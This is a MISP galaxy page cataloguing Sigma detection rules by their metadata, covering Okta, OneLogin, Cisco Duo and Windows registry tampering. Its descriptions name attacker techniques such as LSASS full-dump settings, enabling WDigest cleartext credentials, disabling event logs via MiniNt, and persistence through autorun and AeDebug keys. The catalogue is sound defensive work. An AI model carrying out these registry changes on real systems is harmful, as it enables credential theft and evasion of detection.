Skip to content

Hide Navigation Hide TOC

Edit

Sigma-Rules

MISP galaxy cluster based on Sigma Rules.

Authors
Authors and/or Contributors
@Joseliyo_Jstnk

OneLogin User Assumed Another User

Detects when an user assumed another user account.

Internal MISP references

UUID 62fff148-278d-497e-8ecd-ad6083231a35 which can be used as unique global reference for OneLogin User Assumed Another User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-10-12
falsepositive ['Unknown']
filename onelogin_assumed_another_user.yml
level low
logsource.category No established category
logsource.product onelogin
tags ['attack.impact']

OneLogin User Account Locked

Detects when an user account is locked or suspended.

Internal MISP references

UUID a717c561-d117-437e-b2d9-0118a7035d01 which can be used as unique global reference for OneLogin User Account Locked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-10-12
falsepositive ['System may lock or suspend user accounts.']
filename onelogin_user_account_locked.yml
level low
logsource.category No established category
logsource.product onelogin
tags ['attack.impact']

Okta Policy Rule Modified or Deleted

Detects when an Policy Rule is Modified or Deleted.

Internal MISP references

UUID 0c97c1d3-4057-45c9-b148-1de94b631931 which can be used as unique global reference for Okta Policy Rule Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Unknown']
filename okta_policy_rule_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Identity Provider Created

Detects when a new identity provider is created for Okta.

Internal MISP references

UUID 969c7590-8c19-4797-8c1b-23155de6e7ac which can be used as unique global reference for Okta Identity Provider Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023-09-07
falsepositive ['When an admin creates a new, authorised identity provider.']
filename okta_identity_provider_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098.001']
Related clusters

To see the related clusters, click here.

Okta Admin Role Assigned to an User or Group

Detects when an the Administrator role is assigned to an user or group.

Internal MISP references

UUID 413d4a81-6c98-4479-9863-014785fd579c which can be used as unique global reference for Okta Admin Role Assigned to an User or Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Administrator roles could be assigned to users or group by other admin users.']
filename okta_admin_role_assigned_to_user_or_group.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

Okta Admin Functions Access Through Proxy

Detects access to Okta admin functions through proxy.

Internal MISP references

UUID 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309 which can be used as unique global reference for Okta Admin Functions Access Through Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal @faisalusuf
creation_date 2023-10-25
falsepositive ['False positives are expected if administrators access these function through proxy legitimatly. Apply additional filters if necessary']
filename okta_admin_activity_from_proxy_query.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.credential-access']

New Okta User Created

Detects new user account creation

Internal MISP references

UUID b6c718dd-8f53-4b9f-98d8-93fdca966969 which can be used as unique global reference for New Okta User Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-10-25
falsepositive ['Legitimate and authorized user creation']
filename okta_user_created.yml
level informational
logsource.category No established category
logsource.product okta
tags ['attack.credential-access']

Potential Okta Password in AlternateID Field

Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.

Internal MISP references

UUID 91b76b84-8589-47aa-9605-c837583b82a9 which can be used as unique global reference for Potential Okta Password in AlternateID Field in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023-04-03
falsepositive ['Unlikely']
filename okta_password_in_alternateid_field.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.credential-access', 'attack.t1552']
Related clusters

To see the related clusters, click here.

Okta Application Modified or Deleted

Detects when an application is modified or deleted.

Internal MISP references

UUID 7899144b-e416-4c28-b0b5-ab8f9e0a541d which can be used as unique global reference for Okta Application Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Unknown']
filename okta_application_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta API Token Revoked

Detects when a API Token is revoked.

Internal MISP references

UUID cf1dbc6b-6205-41b4-9b88-a83980d2255b which can be used as unique global reference for Okta API Token Revoked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Unknown']
filename okta_api_token_revoked.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Suspicious Activity Reported by End-user

Detects when an Okta end-user reports activity by their account as being potentially suspicious.

Internal MISP references

UUID 07e97cc6-aed1-43ae-9081-b3470d2367f1 which can be used as unique global reference for Okta Suspicious Activity Reported by End-user in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023-09-07
falsepositive ['If an end-user incorrectly identifies normal activity as suspicious.']
filename okta_suspicious_activity_enduser_report.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.resource-development', 'attack.t1586.003']
Related clusters

To see the related clusters, click here.

Okta Security Threat Detected

Detects when an security threat is detected in Okta.

Internal MISP references

UUID 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 which can be used as unique global reference for Okta Security Threat Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Unknown']
filename okta_security_threat_detected.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.command-and-control']

Okta Application Sign-On Policy Modified or Deleted

Detects when an application Sign-on Policy is modified or deleted.

Internal MISP references

UUID 8f668cc4-c18e-45fe-ad00-624a981cf88a which can be used as unique global reference for Okta Application Sign-On Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Unknown']
filename okta_application_sign_on_policy_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta API Token Created

Detects when a API token is created

Internal MISP references

UUID 19951c21-229d-4ccb-8774-b993c3ff3c5c which can be used as unique global reference for Okta API Token Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Legitimate creation of an API token by authorized users']
filename okta_api_token_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence']

Okta User Account Locked Out

Detects when an user account is locked out.

Internal MISP references

UUID 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a which can be used as unique global reference for Okta User Account Locked Out in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Unknown']
filename okta_user_account_locked_out.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Okta Network Zone Deactivated or Deleted

Detects when an Network Zone is Deactivated or Deleted.

Internal MISP references

UUID 9f308120-69ed-4506-abde-ac6da81f4310 which can be used as unique global reference for Okta Network Zone Deactivated or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Unknown']
filename okta_network_zone_deactivated_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta New Admin Console Behaviours

Detects when Okta identifies new activity in the Admin Console.

Internal MISP references

UUID a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9 which can be used as unique global reference for Okta New Admin Console Behaviours in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023-09-07
falsepositive ["When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual."]
filename okta_new_behaviours_admin_console.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.initial-access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Okta FastPass Phishing Detection

Detects when Okta FastPass prevents a known phishing site.

Internal MISP references

UUID ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e which can be used as unique global reference for Okta FastPass Phishing Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2023-05-07
falsepositive ['Unlikely']
filename okta_fastpass_phishing_detection.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.initial-access', 'attack.t1566']
Related clusters

To see the related clusters, click here.

Okta Admin Role Assignment Created

Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence

Internal MISP references

UUID 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c which can be used as unique global reference for Okta Admin Role Assignment Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2023-01-19
falsepositive ['Legitimate creation of a new admin role assignment']
filename okta_admin_role_assignment_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence']

Okta Unauthorized Access to App

Detects when unauthorized access to app occurs.

Internal MISP references

UUID 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 which can be used as unique global reference for Okta Unauthorized Access to App in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['User might of believe that they had access.']
filename okta_unauthorized_access_to_app.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Policy Modified or Deleted

Detects when an Okta policy is modified or deleted.

Internal MISP references

UUID 1667a172-ed4c-463c-9969-efd92195319a which can be used as unique global reference for Okta Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-12
falsepositive ['Okta Policies being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename okta_policy_modified_or_deleted.yml
level low
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta MFA Reset or Deactivated

Detects when an attempt at deactivating or resetting MFA.

Internal MISP references

UUID 50e068d7-1e6b-4054-87e5-0a592c40c7e0 which can be used as unique global reference for Okta MFA Reset or Deactivated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-09-21
falsepositive ['If a MFA reset or deactivated was performed by a system administrator.']
filename okta_mfa_reset_or_deactivated.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence', 'attack.credential-access', 'attack.defense-evasion', 'attack.t1556.006']
Related clusters

To see the related clusters, click here.

Okta User Session Start Via An Anonymising Proxy Service

Detects when an Okta user session starts where the user is behind an anonymising proxy service.

Internal MISP references

UUID bde30855-5c53-4c18-ae90-1ff79ebc9578 which can be used as unique global reference for Okta User Session Start Via An Anonymising Proxy Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023-09-07
falsepositive ['If a user requires an anonymising proxy due to valid justifications.']
filename okta_user_session_start_via_anonymised_proxy.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.defense-evasion', 'attack.t1562.006']
Related clusters

To see the related clusters, click here.

Cisco Duo Successful MFA Authentication Via Bypass Code

Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.

Internal MISP references

UUID 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8 which can be used as unique global reference for Cisco Duo Successful MFA Authentication Via Bypass Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2024-04-17
falsepositive ['Legitimate user that was assigned on purpose to a bypass group']
filename cisco_duo_mfa_bypass_via_bypass_code.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.credential-access', 'attack.defense-evasion', 'attack.initial-access']

CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd which can be used as unique global reference for CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentversion.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

COM Hijacking via TreatAs

Detect modification of TreatAs key to enable "rundll32.exe -sta" command

Internal MISP references

UUID dc5c24af-6995-49b2-86eb-a9ff62199e82 which can be used as unique global reference for COM Hijacking via TreatAs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-28
falsepositive ['Legitimate use']
filename registry_set_treatas_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Potential Registry Persistence Attempt Via DbgManagedDebugger

Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes

Internal MISP references

UUID 9827ae57-3802-418f-994b-d5ecf5cd974b which can be used as unique global reference for Potential Registry Persistence Attempt Via DbgManagedDebugger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-07
falsepositive ['Legitimate use of the key to setup a debugger. Which is often the case on developers machines']
filename registry_set_dbgmanageddebugger_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.persistence', 'attack.t1574']
Related clusters

To see the related clusters, click here.

Potential Attachment Manager Settings Attachments Tamper

Detects tampering with attachment manager settings policies attachments (See reference for more information)

Internal MISP references

UUID ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a which can be used as unique global reference for Potential Attachment Manager Settings Attachments Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-01
falsepositive ['Unlikely']
filename registry_set_policies_attachments_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Enabling COR Profiler Environment Variables

Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

Internal MISP references

UUID ad89044a-8f49-4673-9a55-cbd88a1b374f which can be used as unique global reference for Enabling COR Profiler Environment Variables in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
creation_date 2020-09-10
falsepositive No established falsepositives
filename registry_set_enabling_cor_profiler_env_variables.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.012']
Related clusters

To see the related clusters, click here.

System Scripts Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1 which can be used as unique global reference for System Scripts Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_system_scripts.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Outlook Security Settings Updated - Registry

Detects changes to the registry values related to outlook security settings

Internal MISP references

UUID c3cefdf4-6703-4e1c-bad8-bf422fc5015a which can be used as unique global reference for Outlook Security Settings Updated - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-28
falsepositive ['Administrative activity']
filename registry_set_office_outlook_security_settings.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

Wow6432Node CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID b29aed60-ebd1-442b-9cb5-16a1d0324adb which can be used as unique global reference for Wow6432Node CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Execution DLL of Choice Using WAB.EXE

This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.

Internal MISP references

UUID fc014922-5def-4da9-a0fc-28c973f41bfb which can be used as unique global reference for Execution DLL of Choice Using WAB.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020-10-13
falsepositive ['Unknown']
filename registry_set_wab_dllpath_reg_change.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Application Allowed Through Exploit Guard

Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings

Internal MISP references

UUID 42205c73-75c8-4a63-9db1-e3782e06fda0 which can be used as unique global reference for Suspicious Application Allowed Through Exploit Guard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-05
falsepositive ['Unlikely']
filename registry_set_exploit_guard_susp_allowed_apps.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Custom Protocol Handler

Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.

Internal MISP references

UUID fdbf0b9d-0182-4c43-893b-a1eaab92d085 which can be used as unique global reference for Potential Persistence Via Custom Protocol Handler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-05-30
falsepositive ['Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.']
filename registry_set_persistence_custom_protocol_handler.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Add Debugger Entry To AeDebug For Persistence

Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes

Internal MISP references

UUID 092af964-4233-4373-b4ba-d86ea2890288 which can be used as unique global reference for Add Debugger Entry To AeDebug For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Legitimate use of the key to setup a debugger. Which is often the case on developers machines']
filename registry_set_aedebug_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potentially Suspicious Desktop Background Change Via Registry

Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Internal MISP references

UUID 85b88e05-dadc-430b-8a9e-53ff1cd30aae which can be used as unique global reference for Potentially Suspicious Desktop Background Change Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
creation_date 2023-12-21
falsepositive ['Administrative scripts that change the desktop background to a company logo or other image.']
filename registry_set_desktop_background_change.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Potential PendingFileRenameOperations Tampering

Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.

Internal MISP references

UUID 4eec988f-7bf0-49f1-8675-1e6a510b3a2a which can be used as unique global reference for Potential PendingFileRenameOperations Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023-01-27
falsepositive ['Installers and updaters may set currently in use files for rename or deletion after a reboot.']
filename registry_set_susp_pendingfilerenameoperations.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potential Persistence Via GlobalFlags

Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys

Internal MISP references

UUID 36803969-5421-41ec-b92f-8500f79c23b0 which can be used as unique global reference for Potential Persistence Via GlobalFlags in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Karneades, Jonhnathan Ribeiro, Florian Roth
creation_date 2018-04-11
falsepositive ['Unknown']
filename registry_set_persistence_globalflags.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1546.012', 'car.2013-01-002']
Related clusters

To see the related clusters, click here.

Potential Attachment Manager Settings Associations Tamper

Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)

Internal MISP references

UUID a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47 which can be used as unique global reference for Potential Attachment Manager Settings Associations Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-01
falsepositive ['Unlikely']
filename registry_set_policies_associations_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Hiding User Account Via SpecialAccounts Registry Key

Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.

Internal MISP references

UUID f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd which can be used as unique global reference for Hiding User Account Via SpecialAccounts Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022-07-12
falsepositive ['Unknown']
filename registry_set_special_accounts.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.002']
Related clusters

To see the related clusters, click here.

Registry Persistence via Explorer Run Key

Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder

Internal MISP references

UUID b7916c2a-fa2f-4795-9477-32b731f70f11 which can be used as unique global reference for Registry Persistence via Explorer Run Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community
creation_date 2018-07-18
falsepositive ['Unknown']
filename registry_set_susp_reg_persist_explorer_run.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential CobaltStrike Service Installations - Registry

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.

Internal MISP references

UUID 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 which can be used as unique global reference for Potential CobaltStrike Service Installations - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Wojciech Lesicki
creation_date 2021-06-29
falsepositive ['Unlikely']
filename registry_set_cobaltstrike_service_installs.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.execution', 'attack.privilege-escalation', 'attack.lateral-movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Windows Event Log Access Tampering Via Registry

Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".

Internal MISP references

UUID ba226dcf-d390-4642-b9af-b534872f1156 which can be used as unique global reference for Windows Event Log Access Tampering Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2025-01-16
falsepositive ['Administrative activity, still unlikely']
filename registry_set_disable_windows_event_log_access.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1547.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

RestrictedAdminMode Registry Value Tampering

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise

Internal MISP references

UUID d6ce7ebd-260b-4323-9768-a9631c8d4db2 which can be used as unique global reference for RestrictedAdminMode Registry Value Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023-01-13
falsepositive ['Unknown']
filename registry_set_lsa_disablerestrictedadmin.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Lsass Full Dump Request Via DumpType Registry Settings

Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.

Internal MISP references

UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f719 which can be used as unique global reference for Lsass Full Dump Request Via DumpType Registry Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash
creation_date 2022-12-08
falsepositive ['Legitimate application that needs to do a full dump of their process']
filename registry_set_lsass_usermode_dumping.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Security Event Logging Disabled via MiniNt Registry Key - Registry Set

Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events. Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing. Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.

Internal MISP references

UUID 8839e550-52d7-4958-9f2f-e13c1e736838 which can be used as unique global reference for Security Event Logging Disabled via MiniNt Registry Key - Registry Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-04-09
falsepositive ['Highly Unlikely']
filename registry_set_create_minint_key.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1562.002', 'attack.t1112', 'car.2022-03-001']
Related clusters

To see the related clusters, click here.

Hypervisor Enforced Paging Translation Disabled

Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.

Internal MISP references

UUID 7f2954d2-99c2-4d42-a065-ca36740f187b which can be used as unique global reference for Hypervisor Enforced Paging Translation Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-07-05
falsepositive ['Unknown']
filename registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Wdigest Enable UseLogonCredential

Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials

Internal MISP references

UUID d6a9b252-c666-4de6-8806-5561bbbd3bdc which can be used as unique global reference for Wdigest Enable UseLogonCredential in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019-09-12
falsepositive ['Unknown']
filename registry_set_wdigest_enable_uselogoncredential.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

DHCP Callout DLL Installation

